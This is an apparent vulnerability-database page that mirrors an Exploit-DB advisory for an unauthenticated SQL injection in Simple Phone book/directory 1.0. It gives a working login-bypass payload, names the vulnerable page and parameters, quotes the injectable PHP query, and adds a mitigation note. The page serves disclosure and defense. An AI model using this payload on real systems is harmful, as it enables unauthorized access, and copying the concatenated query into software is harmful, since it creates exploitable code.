Simple Phone book/directory 1.0 - 'Username' SQL Injection (Unauthenticated)

vendor:

Simple Phone book/directory

by:

Justin White

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Simple Phone book/directory

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:sourcecodester:simple_phone_book/directory:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux (Ubuntu 20.04)

2021

Simple Phone book/directory 1.0 – ‘Username’ SQL Injection (Unauthenticated)

Using the username ' or sleep(5)='-- -' and a blank password to login will have the webapp sleep for 5 seconds, then the user will be logged in as ' or sleep(5)='-- -'.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied data should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

# Exploit Title: Simple Phone book/directory 1.0 - 'Username' SQL Injection (Unauthenticated)
# Date: 21/08/2021
# Exploit Author: Justin White
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/13011/phone-bookphone-directory.html
# Version: 1.0
# Testeted on: Linux (Ubuntu 20.04) using LAMPP

## SQL Injection

# Vulnerable page
http://localhost/PhoneBook/index.php

# Vulnerable paramater 
username1 & password

# POC
Username = ' or sleep(5)='-- -
Password = ' '

Using these to login will have the webapp sleep for 5 seconds, then you will be logged in as "' or sleep(5)='-- -"

# Vulnerable Code
index.php line 13
$sql = mysqli_query($dbcon,"SELECT * FROM userdetails WHERE username = '$username' AND password = '$password'");